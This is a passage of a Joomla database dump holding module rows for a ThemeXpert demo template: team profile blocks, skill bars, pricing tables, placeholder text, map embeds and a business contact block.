</div>\r\n</div>\r\n\r\n<div class=\"width-25\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img7.jpg\" alt=\"\" />\r\n <h3>Radamel Falcao</h3>\r\n <h4>Intern. Developer</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n </div>\r\n</div>\r\n',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center team team-polaroid\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(223,0,'Designer Team || Lorem Ipsum is simply dummy','','<div class=\"width-25\">\n <div class=\"block\">\n <img src=\"images/pages/team/img6.jpg\" alt=\"\" />\n <h3>Luis Suárez</h3>\n <h4>Graphic Designer</h4>\n <div class=\"social-links\">\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\n </div>\n </div>\n</div>\n\n<div class=\"width-25\">\n <div class=\"block\">\n <img src=\"images/pages/team/img9.jpg\" alt=\"\" />\n <h3>Steven Gerrard</h3>\n <h4>Artist</h4>\n <div class=\"social-links\">\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\n </div>\n </div>\n</div>\n\n<div class=\"width-25\">\n <div class=\"block\">\n <img src=\"images/pages/team/img8.jpg\" alt=\"\" />\n <h3>Daniel Sturridge</h3>\n <h4>QA</h4>\n <div class=\"social-links\">\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\n </div>\n </div>\n</div>\n\n<div class=\"width-25\">\n <div class=\"block\">\n <img src=\"images/pages/team/img2.jpg\" alt=\"\" />\n <h3>Mesut Özil</h3>\n <h4>Intern. Designer</h4>\n <div class=\"social-links\">\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\n </div>\n </div>\n</div>\n',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center team team-round\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(224,0,'Skill Sets','test','<h2>Skill Set-1</h2>\r\n\r\n<h4>PHP</h4>\r\n<div class=\"progress progress-green\">\r\n <div class=\"progress-bar\" style=\"width: 88%;\">88%</div>\r\n</div>\r\n\r\n<h4>JavaScript</h4>\r\n<div class=\"progress progress-red\">\r\n <div class=\"progress-bar\" style=\"width: 97%;\">97%</div>\r\n</div>\r\n\r\n<h4>Node.js</h4>\r\n<div class=\"progress progress-orange\">\r\n <div class=\"progress-bar\" style=\"width: 80%;\">80%</div>\r\n</div>\r\n\r\n<h4>Ruby on Rails</h4>\r\n<div class=\"progress progress-purple\">\r\n <div class=\"progress-bar\" style=\"width: 78%;\">78%</div>\r\n</div>\r\n\r\n\r\n\r\n<h2>Skill Set-2</h2>\r\n\r\n\r\n<div class=\"progress progress-green\">\r\n <div class=\"progress-bar\" style=\"width: 88%;\">PHP 88%</div>\r\n</div>\r\n\r\n\r\n<div class=\"progress progress-red\">\r\n <div class=\"progress-bar\" style=\"width: 97%;\">JavaScript 97%</div>\r\n</div>\r\n\r\n<div class=\"progress progress-orange\">\r\n <div class=\"progress-bar\" style=\"width: 80%;\">Node.js 80%</div>\r\n</div>\r\n\r\n<div class=\"progress progress-purple\">\r\n <div class=\"progress-bar\" style=\"width: 78%;\">Ruby on Rails 78%</div>\r\n</div>',1,'feature-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box1\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(225,253,'What We Do','Xpert Accordion in About Us Page 1-2','',4,'contentbottom-1',736,'2015-03-15 05:46:11','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_xpertaccordion',1,1,'{\"content_source\":\"joomla\",\"count\":\"4\",\"intro\":1,\"intro_limit_type\":\"words\",\"intro_limit\":\"30\",\"theme\":\"basic\",\"load_jquery\":1,\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\",\"moduleclass_sfx\":\"\",\"jomcatfilter\":1,\"jom_catid\":[\"80\"],\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":0,\"k2_catid\":\"\",\"k2_get_children\":1,\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(228,0,'Welcome To Our Website','Intro Article for About us and Service Page','<p>\r\n Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.\r\n \r\n</p>',1,'feature-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(229,252,'Our Skills','Progress bar on About us page 1-2','<div class=\"progress progress-green\">\r\n<div class=\"progress-bar\" style=\"width: 88%;\">PHP 88%</div>\r\n</div>\r\n<div class=\"progress progress-red\">\r\n<div class=\"progress-bar\" style=\"width: 97%;\">JavaScript 97%</div>\r\n</div>\r\n<div class=\"progress progress-orange\">\r\n<div class=\"progress-bar\" style=\"width: 80%;\">Node.js 80%</div>\r\n</div>\r\n<div class=\"progress progress-purple\">\r\n<div class=\"progress-bar\" style=\"width: 78%;\">Ruby on Rails 78%</div>\r\n</div>',1,'contentbottom-1',736,'2015-03-15 05:45:59','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(230,0,'Meet The Team','','<div class=\"width-33\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img1.jpg\" alt=\"\" />\r\n <h3>Lionel Messi</h3>\r\n <h4>CEO</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n </div>\r\n</div>\r\n\r\n <div class=\"width-33\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img3.jpg\" alt=\"\" />\r\n <h3>Cristiano Ronaldo</h3>\r\n <h4>Co-Founder</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n </div>\r\n</div>\r\n\r\n <div class=\"width-33\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img2.jpg\" alt=\"\" />\r\n <h3>Neymar</h3>\r\n <h4>VP Marketing</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n </div>\r\n</div>',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center team\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(231,0,'Meet The Team || Lorem Ipsum is simply dummy text of the printing and typesetting industry','Team about us 2','<div class=\"width-25\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img4.jpg\" alt=\"\" />\r\n <h3>Wayne Rooney</h3>\r\n <h4>CTO</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n </div>\r\n</div>\r\n\r\n<div class=\"width-25\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img5.jpg\" alt=\"\" />\r\n <h3>Zlatan Ibrahimović</h3>\r\n <h4>Front End Engineer</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n </div>\r\n</div>\r\n\r\n<div class=\"width-25\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img6.jpg\" alt=\"\" />\r\n <h3>Edinson Cavani</h3>\r\n <h4>Graphic Designer</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n </div>\r\n</div>\r\n\r\n<div class=\"width-25\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img7.jpg\" alt=\"\" />\r\n <h3>Radamel Falcao</h3>\r\n <h4>Intern. Developer</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n </div>\r\n</div>\r\n',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center team team-round\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(234,0,'Why Choose Us','Xpert Accordion in Service Page','',4,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_xpertaccordion',1,1,'{\"content_source\":\"joomla\",\"count\":\"4\",\"intro\":1,\"intro_limit_type\":\"words\",\"intro_limit\":\"30\",\"theme\":\"basic\",\"load_jquery\":1,\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\",\"moduleclass_sfx\":\"\",\"jomcatfilter\":1,\"jom_catid\":[\"80\"],\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":0,\"k2_catid\":\"\",\"k2_get_children\":1,\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\"}',0,'*'),(235,0,'Service & Features','for service page 1','<div class=\"service-intro clearfix block\">\r\n<div class=\"grid3\"><h1>Our Services</h1></div>\r\n<div class=\"grid8\"><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled</p></div>\r\n \r\n</div>\r\n\r\n\r\n<div class=\"width-33\" data-uk-scrollspy=\"{cls:\'animation-slide-bottom\', delay: 300}\">\r\n <div class=\"block\">\r\n <h3 class=\"title\"><i class=\"icon-cogs\"></i>Easy Customization</h3>\r\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.</p>\r\n </div>\r\n</div>\r\n\r\n<div class=\"width-33\" data-uk-scrollspy=\"{cls:\'animation-slide-bottom\', delay: 600}\">\r\n <div class=\"block\">\r\n <h3 class=\"title\"><i class=\"icon-desktop\"></i>Responsive Layout</h3>\r\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.</p>\r\n </div>\r\n</div>\r\n\r\n<div class=\"width-33\" data-uk-scrollspy=\"{cls:\'animation-slide-bottom\', delay: 900}\">\r\n <div class=\"block\">\r\n <h3 class=\"title\"><i class=\"icon-bar-chart\"></i>SEO Friendly</h3>\r\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.</p>\r\n </div>\r\n</div>',1,'contenttop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"service nomargin-bottom nopadding-bottom\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(236,0,'Other Services','','',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_xperttabs',1,1,'{\"content_source\":\"joomla\",\"count\":\"5\",\"tabs_position\":\"top\",\"tabs_interaction\":\"click\",\"tabs_title_type\":\"content\",\"tabs_title_custom\":\"Tab Title1, Tab Title2, Tab Title3\",\"intro_limit_type\":\"0\",\"intro_limit\":\"30\",\"readmore\":\"1\",\"readmore_label\":\"Read More\",\"routing_type\":\"default\",\"menuitemid\":\"435\",\"mod_style\":\"style2\",\"transition\":\"fade-slide\",\"jomcatfilter\":1,\"jom_catid\":[\"80\"],\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":0,\"k2_catid\":\"\",\"k2_get_children\":1,\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\",\"moduleclass_sfx\":\"\",\"auto_module_id\":1,\"module_unique_id\":\"xs_1\",\"load_jquery\":\"1\",\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\"}',0,'*'),(237,0,'24/7 Support','','<p>\r\nLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type\r\n</p>\r\n<a class=\"btn btn-primary btn-large\">Learn More</a>',1,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-ambulance\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(238,0,'Cloud Hosting','','<p>\nLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type\n</p>\n<a class=\"btn btn-primary btn-large\">Learn More</a>',1,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-cloud box-white\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(239,0,'Enjoy Awesomeness','','<p>\r\nLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type\r\n</p>\r\n<a class=\"btn btn-primary btn-large\">Learn More</a>',1,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-coffee\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(240,0,'Pricing Table','',' <ul class=\"width-25\">\r\n <li class=\"head\">Silver</li>\r\n <li class=\"price\">$49</li>\r\n <li>3 months</li>\r\n <li>Unlimited domains</li>\r\n <li>Domain support</li>\r\n <li>Access all themes & extensions</li>\r\n <li>Source PSD file</li>\r\n <li>Quickstart pack</li>\r\n <li>Copyright removal</li>\r\n <li>Forum Access</li>\r\n <li>Ticket support</li>\r\n <li>No discount on renewal</li>\r\n <li>\r\n <a class=\"btn btn-primary\" href=\"/index.php?option=com_payplans&view=plan&task=subscribe&plan_id=1\">Join Now!</a>\r\n </li>\r\n </ul>\r\n <ul class=\"width-25 highlight\">\r\n <li class=\"head\">Bronze</li>\r\n <li class=\"price\">$99</li>\r\n <li>1 year</li>\r\n <li>Unlimited domains</li>\r\n <li>Domain support</li>\r\n <li>Access all themes & extensions</li>\r\n <li>Source PSD file</li>\r\n <li>Quickstart pack</li>\r\n <li>Copyright removal</li>\r\n <li>Forum Access</li>\r\n <li>Ticket support</li>\r\n <li>10% discount on renewal</li>\r\n <li>\r\n <a class=\"btn btn-primary\" href=\"/index.php?option=com_payplans&view=plan&task=subscribe&plan_id=2\">Join Now!</a>\r\n </li>\r\n </ul>\r\n <ul class=\"width-25\">\r\n <li class=\"head\">Gold</li>\r\n <li class=\"price\">$249</li>\r\n <li>1 year</li>\r\n <li>Unlimited domains</li>\r\n <li>Domain support</li>\r\n <li>Access all themes & extensions</li>\r\n <li>Source PSD file</li>\r\n <li>Quickstart pack</li>\r\n <li>Copyright removal</li>\r\n <l>Forum Access</li>\r\n <li>Ticket support</li>\r\n <li>20% discount on renewal</li>\r\n <li>\r\n <a class=\"btn btn-primary\" href=\"/index.php?option=com_payplans&view=plan&task=subscribe&plan_id=3\">Join Now!</a>\r\n </li>\r\n </ul>\r\n \r\n <ul class=\"width-25\">\r\n <li class=\"head\">Platinum</li>\r\n <li class=\"price\">$349</li>\r\n <li>1 year</li>\r\n <li>Unlimited domains</li>\r\n <li>Domain support</li>\r\n <li>Access all themes & extensions</li>\r\n <li>Source PSD file</li>\r\n <li>Quickstart pack</li>\r\n <li>Copyright removal</li>\r\n <l>Forum Access</li>\r\n <li>Ticket support</li>\r\n <li>20% discount on renewal</li>\r\n <li>\r\n <a class=\"btn btn-primary\" href=\"/index.php?option=com_payplans&view=plan&task=subscribe&plan_id=3\">Join Now!</a>\r\n </li>\r\n </ul>\r\n',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"pricing pricing1\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(241,0,'Pricing Table 2','','<ul class=\"width-33\">\r\n<div class=\"table-wrap\">\r\n <li class=\"head purple-head\">Starter</li>\r\n <li class=\"price\"><span class=\"currency\">$</span>249<span class=\"period\">/mo</span></li>\r\n <li class=\"includes\">Including</li>\r\n <li>40 GB Disk Space</li>\r\n <li>20 Sub Domains</li>\r\n <li>80 MySQL Database</li>\r\n <li>Unlimited Users</li>\r\n <li>\r\n <a class=\"btn btn-primary\" href=\"/index.php?option=com_payplans&view=plan&task=subscribe&plan_id=3\">Join Now!</a>\r\n </li>\r\n </div>\r\n </ul>\r\n \r\n \r\n <ul class=\"width-33\">\r\n<div class=\"table-wrap\">\r\n <li class=\"head blue-head\">Basic</li>\r\n <li class=\"price\"><span class=\"currency\">$</span>249<span class=\"period\">/mo</span></li>\r\n <li class=\"includes\">Including</li>\r\n <li>40 GB Disk Space</li>\r\n <li>20 Sub Domains</li>\r\n <li>80 MySQL Database</li>\r\n <li>Unlimited Users</li>\r\n <li>\r\n <a class=\"btn btn-primary\" href=\"/index.php?option=com_payplans&view=plan&task=subscribe&plan_id=3\">Join Now!</a>\r\n </li>\r\n </div>\r\n </ul>\r\n \r\n \r\n <ul class=\"width-33\">\r\n<div class=\"table-wrap\">\r\n <li class=\"head orange-head\">Pro</li>\r\n <li class=\"price\"><span class=\"currency\">$</span>249<span class=\"period\">/mo</span></li>\r\n <li class=\"includes\">Including</li>\r\n <li>40 GB Disk Space</li>\r\n <li>20 Sub Domains</li>\r\n <li>80 MySQL Database</li>\r\n <li>Unlimited Users</li>\r\n <li>\r\n <a class=\"btn btn-primary\" href=\"/index.php?option=com_payplans&view=plan&task=subscribe&plan_id=3\">Join Now!</a>\r\n </li>\r\n </div>\r\n </ul>\r\n ',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"pricing2\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(242,0,'Contact Info','','<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.</p>\r\n<div class=\"info-block\"><i class=\"icon-phone icon-2x pull-left\"></i> <h4>0123 091234598</h4></div>\r\n<div class=\"info-block\"><i class=\"icon-map-marker icon-2x pull-left\"></i> <h4>Seattle, WA 00000, USA</h4></div>\r\n<div class=\"info-block\"><i class=\" icon-envelope icon-2x pull-left\"></i> <h4>hello@loremipsum.com</h4></div>\r\n',1,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(243,0,'Our Location','','',1,'contenttop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(244,0,'Lets Get in Touch','Map Contact us page 2','<iframe width=\"100%\" height=\"300\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=Seattle,+WA,+United+States&aq=0&oq=Seattle&sll=37.0625,-95.677068&sspn=42.85226,86.572266&ie=UTF8&hq=&hnear=Seattle,+King+County,+Washington&t=m&z=11&ll=47.60621,-122.332071&output=embed\"></iframe>',1,'maintop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-map-marker\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(245,237,'Quick Deatails','contact us page 2','<p>P.O. Box 629 ,Ruwi P.O Box 120804 </p>\r\n<p>Postal Code 112, Sultanate Of Oman Dubi - United Arab Emirates</p>\r\n<p>Phone: +968 24700454 Phone +9714 305 5390<span style=\"font-family: \'Comic Sans MS\'; font-size: 12pt; line-height: 1.3em;\"> </span></p>\r\n<p>Fax : +968 24780500 <span style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Email: info@fitoman.com</span></p>\r\n<p>Email: info@fitoman.com</p>\r\n<p>Website: fitoman.com</p>\r\n<p> </p>\r\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3656.421432692066!2d58.541644573215756!3d23.589214230358106!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0000000000000000%3A0x42742fb4e2fe3f11!2sSugar+Clinic+-+International+Medical+Center!5e0!3m2!1sen!2som!4v1426153632642\" width=\"550\" height=\"350\" frameborder=\"0\"></iframe></p>',1,'contenttop-2',736,'2015-04-19 08:04:02','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-hand-right\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(246,0,'Administration Team','','<div style=\"margin: 10px 0;\"><img src=\"images/pages/team/img9.jpg\" alt=\"\">\n <h4>Steven Gerrard</h4>\n<h5>CEO & Co-Founder</h5>\n<div class=\"social-links\">\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\n </div></div>\n \n\n<div style=\"margin: 10px 0;\"><img src=\"images/pages/team/img3.jpg\" alt=\"\">\n <h4>Cristiano Ronaldo</h4>\n<h5>Marketing Executive</h5>\n<div class=\"social-links\">\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\n </div></div>\n \n\n<div style=\"margin: 10px 0;\"><img src=\"images/pages/team/img5.jpg\" alt=\"\">\n <h4>Neymar</h4>\n<h5>HRM</h5>\n<div class=\"social-links\">\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\n </div></div>\n ',1,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"team team-round align-center\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(247,0,'Why Choose Us','','',1,'contenttop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_xpertaccordion',1,1,'{\"content_source\":\"joomla\",\"count\":\"3\",\"intro\":1,\"intro_limit_type\":\"0\",\"intro_limit\":\"30\",\"theme\":\"elegant\",\"load_jquery\":1,\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\",\"moduleclass_sfx\":\"\",\"jomcatfilter\":1,\"jom_catid\":[\"79\"],\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":0,\"k2_catid\":\"\",\"k2_get_children\":1,\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\"}',0,'*'),(248,0,'What We Do','','',1,'contenttop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 